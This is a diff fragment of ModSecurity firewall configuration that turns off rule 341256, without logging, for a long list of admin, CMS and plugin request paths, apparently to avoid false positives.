+SecRule REQUEST_FILENAME "/admin/sidenavsave\.php" "phase:2,id:93271,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imp/message\.php" "phase:2,id:93272,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/editor/wsd" "phase:2,id:93273,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/sitesettings\.php" "phase:2,id:93274,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/workadmin\.php" "phase:2,id:93275,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addons/imagelibrary/select_image\.php" "phase:2,id:93276,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/news_edit\.php" "phase:2,id:93277,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-faq-css\.php" "phase:2,id:93278,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cfk-action\.php" "phase:2,id:93279,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/htmle\.php" "phase:2,id:93280,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/product_edit\.php" "phase:2,id:93281,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cgi-bin/backuppc_admin" "phase:2,id:93282,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/delivery/spc\.php" "phase:2,id:93283,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/includes/share\.php" "phase:2,id:93284,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/kronolith/" "phase:2,id:93285,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/delivery/ajs\.php" "phase:2,id:93286,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/browse\.php" "phase:2,id:93287,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/watermark\.php" "phase:2,id:93288,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addcontent\.php" "phase:2,id:93289,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/showmail\.php" "phase:2,id:93290,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aprogram\.php" "phase:2,id:93291,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit-event\.php" "phase:2,id:93292,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:93293,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/extrainfo\.php" "phase:2,id:93294,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/company/modify\.php" "phase:2,id:93295,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dimcp/setting\.php" "phase:2,id:93296,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jg_radiof\.php" "phase:2,id:93297,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tiki-editpage\.php" "phase:2,id:93298,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/power_news_add\.php" "phase:2,id:93299,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jg_teksta\.php" "phase:2,id:93300,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/static_content_editresult\.php" "phase:2,id:93301,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopadmin/login\.php" "phase:2,id:93302,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sgal_thumb\.php" "phase:2,id:93303,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/livehelp/image\.php" "phase:2,id:93304,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ajax\.php" "phase:2,id:93305,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/saveconfig\.php" "phase:2,id:93306,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/products\.php" "phase:2,id:93307,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/edit-process\.php" "phase:2,id:93308,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/phpminiadmin\.php" "phase:2,id:93309,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/freepost\.php" "phase:2,id:93310,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/advertpro/admin/admin\.pl" "phase:2,id:93311,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/inc/flash_to_db_insert\.php" "phase:2,id:93312,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/blocks/form/services\.php" "phase:2,id:93313,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settings/" "phase:2,id:93314,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manager/ispmgr" "phase:2,id:93315,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editimage\.html" "phase:2,id:93316,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/siteprefs\.php" "phase:2,id:93317,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/include/update\.php" "phase:2,id:93318,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/directory\.php" "phase:2,id:93319,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/video_add\.php" "phase:2,id:93320,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/products/entry/index\.php" "phase:2,id:93321,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/editconfirm\.php" "phase:2,id:93322,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/connectors/element/snippet\.php" "phase:2,id:93323,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/podpress/podpress_backend\.ph" "phase:2,id:93324,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/productos_edit\.php" "phase:2,id:93325,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/produto_script\.php" "phase:2,id:93326,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_structure\.php" "phase:2,id:93327,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mail\.cgi" "phase:2,id:93328,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/hades_framework/option_panel/ajax\.php" "phase:2,id:93329,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/apsona_svc\.php" "phase:2,id:93330,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/s_listing\.php" "phase:2,id:93331,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/module-inventory/" "phase:2,id:93332,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/items_name_result\.php" "phase:2,id:93333,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/webmail/src/addressbook\.php" "phase:2,id:93334,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:93335,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/s_search\.php" "phase:2,id:93336,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cpage\.php" "phase:2,id:93337,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/display_property\.aspx" "phase:2,id:93338,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/admin-stats\.php" "phase:2,id:93339,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quickscan/8a\.php" "phase:2,id:93340,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/creatematchstats\.php" "phase:2,id:93341,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add-process\.php" "phase:2,id:93342,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/updates\.php" "phase:2,id:93343,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/login_status\.php" "phase:2,id:93344,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/db_search\.php" "phase:2,id:93345,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/gravityforms/preview\.php" "phase:2,id:93346,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/contmin\.php" "phase:2,id:93347,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/add_static_cgi\.php" "phase:2,id:93348,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ash/default\.php" "phase:2,id:93349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ratesadmin\.php" "phase:2,id:93350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/testamin\.php" "phase:2,id:93351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dartiframe\.html" "phase:2,id:93352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jomsocial/profile/edit" "phase:2,id:93353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administratie/pro/servers\.php" "phase:2,id:93354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/payment\.php" "phase:2,id:93355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms/save\.php" "phase:2,id:93356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/pages/update\.php" "phase:2,id:93357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/options\.php" "phase:2,id:93358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/catalogs/save_element\.php" "phase:2,id:93359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_modal/save/" "phase:2,id:93360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/favicon\.php" "phase:2,id:93361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/components\.php" "phase:2,id:93362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/postbagdo\.php" "phase:2,id:93363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/media\.php" "phase:2,id:93364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/index3\.php" "phase:2,id:93365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portaladmin/edit_annonce1\.php" "phase:2,id:93366,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/portaladmin/add_annonce1\.php" "phase:2,id:93367,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms_centralparking\.php" "phase:2,id:93368,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save_lesson\.php" "phase:2,id:93369,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_brochure_edit\.php" "phase:2,id:93370,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/aboutus-pages_exe\.php" "phase:2,id:93371,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tbl_alter\.php" "phase:2,id:93372,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/newspro\.cgi" "phase:2,id:93373,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/video_edit\.php" "phase:2,id:93374,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/email/test\.php" "phase:2,id:93375,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/groupedit\.php" "phase:2,id:93376,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/retail_oordenkings\.edit\.php" "phase:2,id:93377,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/lesson_edit\.php" "phase:2,id:93378,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailtemplate_dhltrack_result\.php" "phase:2,id:93379,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/browse_links\.php" "phase:2,id:93380,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/quote_rads\.php" "phase:2,id:93381,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/tweet-blender/ws\.php" "phase:2,id:93382,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/video_edit\.php" "phase:2,id:93383,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/save\.json" "phase:2,id:93384,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/test\.html" "phase:2,id:93385,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/edit\.php" "phase:2,id:93386,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/nav-menus\.php" "phase:2,id:93387,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin-post\.php" "phase:2,id:93388,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/portfolio/edit\.php" "phase:2,id:93389,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/pods/ajax/showform\.php" "phase:2,id:93390,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/manage/team/create\.php" "phase:2,id:93391,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/sage_download\.php" "phase:2,id:93392,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/template_content_editresult\.php" "phase:2,id:93393,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adm/index\.php" "phase:2,id:93394,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/e_brochure_email\.php" "phase:2,id:93395,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addlinks\.php" "phase:2,id:93396,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/adminsettings\.php" "phase:2,id:93397,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/modules/news/nav\.php" "phase:2,id:93398,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/addnews\.php" "phase:2,id:93399,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/postarticles\.php" "phase:2,id:93400,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/contactus\.php" "phase:2,id:93401,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/administrator/homepagecontent\.php" "phase:2,id:93402,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filebrowser/umifilebrowser\.html" "phase:2,id:93403,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/coupons_exclusions\.php" "phase:2,id:93404,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/voltrank" "phase:2,id:93405,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin_configvalues\.php" "phase:2,id:93406,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/processaddeditproduct\.php" "phase:2,id:93407,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/eecms\.php" "phase:2,id:93408,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/builder/postsitedata\.php" "phase:2,id:93409,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/settingsgeneralaction\.php" "phase:2,id:93410,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:93411,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/include/load_page\.php" "phase:2,id:93412,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/profile/shopsettings\.jsf" "phase:2,id:93413,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:93414,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:93415,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/jupgrade/administrator/index\.php" "phase:2,id:93416,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/v2_configvars_engine\.php" "phase:2,id:93417,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bookingcalendar/php/save\.php" "phase:2,id:93418,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wizard/start\.php" "phase:2,id:93419,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/mailtemplateeditaction\.php" "phase:2,id:93420,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/settingscontact\.php" "phase:2,id:93421,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/property-edit\.php" "phase:2,id:93422,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/server/webissues/handler\.php" "phase:2,id:93423,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/db_edit\.php" "phase:2,id:93424,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/index\.php/datafeedmanager/adminhtml_datafeedmanager/save" "phase:2,id:93425,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/venue-edit\.php" "phase:2,id:93426,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:93427,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-install\.php" "phase:2,id:93428,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/products_add\.php" "phase:2,id:93429,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/story_uploader\.php" "phase:2,id:93430,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/include/ajax_price\.php" "phase:2,id:93431,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/page_editor/save_page\.php" "phase:2,id:93432,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/story_prosess\.php" "phase:2,id:93433,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/admin/story_process\.php" "phase:2,id:93434,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/seopanel/login\.php" "phase:2,id:93435,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/doku\.php" "phase:2,id:93436,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/shopperpress/ppt/ajax/actions\.php" "phase:2,id:93437,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/spostarbust/images/index\.php" "phase:2,id:93438,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/emailxmlasattachment\.ph" "phase:2,id:93439,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/console/manage_products\.php" "phase:2,id:93440,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/agents/uploader/doupload\.php" "phase:2,id:93441,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:93442,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/textpattern/index\.php" "phase:2,id:93443,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/filemanager/filemanager\.php" "phase:2,id:93444,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/imagecrop\.php" "phase:2,id:93445,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/dashboard\.php" "phase:2,id:93446,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/ie-style\.php" "phase:2,id:93447,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/plugins/likebox\.php" "phase:2,id:93448,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
+SecRule REQUEST_FILENAME "/bb_gate\.php" "phase:2,id:93449,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=341256"
+
